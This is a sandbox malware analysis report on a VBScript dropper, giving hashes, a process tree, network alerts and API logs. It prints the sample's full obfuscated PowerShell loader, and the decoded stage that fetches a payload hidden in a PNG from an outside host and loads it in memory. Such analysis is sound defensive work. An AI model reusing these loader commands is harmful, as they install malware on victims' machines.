popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

HTMLIEsearchHistory.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 30, 2023, 5:35 p.m. Oct. 30, 2023, 5:37 p.m.
Size 137.3KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 c3331ba028e5bac96943a698e5147891
SHA256 eafb3cea4da435ac46bda9d56ab4b7624a0b0c3d848496d169a1b00b8eba0e03
CRC32 F95829E2
ssdeep 1536:F+Rqe4Mi3mI2hb7KZ18C2NGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDDpOAWc:PeBQFJy
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLIEsearchHistory.vbs

    2664

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2808

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlcento'))"

        2916

Name Response Post-Analysis Lookup
paste.ee
A 172.67.187.200
A 104.21.84.67
104.21.84.67
wallpapercave.com
A 104.22.53.71
A 104.22.52.71
A 172.67.29.26
172.67.29.26
IP Address Status Action
104.22.52.71 Active Moloch
164.124.101.2 Active Moloch
172.67.187.200 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49166 -> 104.22.52.71:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49161 -> 172.67.187.200:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.101:49161 -> 172.67.187.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 104.22.52.71:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49161
172.67.187.200:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:142
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-O
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData <<<< ($imageUr
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: l);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.Index
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: Of($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: bject[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm'
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: , '5' , 'C:\Windows\Temp\', 'htmlcento'))
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x00000103
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: At line:1 char:205
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-O
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$im
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: ageText = [System.Text.Encoding]::UTF8.GetString <<<< ($imageBytes);$startFlag
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.Index
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: Of($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: bject[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm'
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: , '5' , 'C:\Windows\Temp\', 'htmlcento'))
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001e3
1 1 0

WriteConsoleW

 buffer: At line:1 char:311
console_handle: 0x000001ef
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-O
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: bject System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$im
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: ageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<B
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: ASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf <<<
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: < ($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $end
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: Index - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64L
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: ength);$commandBytes = [System.Convert]::FromBase64String($base64Command);$load
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: edAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedA
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: ssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [o
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: bject[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm'
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: , '5' , 'C:\Windows\Temp\', 'htmlcento'))
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: ception
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042da48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e1c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042da08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042da08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042da08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042d608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042dfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e348
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e288
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0042e288
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cf748
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cfe48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cfe48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004cfe48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004d0108
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET https://paste.ee/d/AXiiR
Time & API Arguments Status Return Repeated

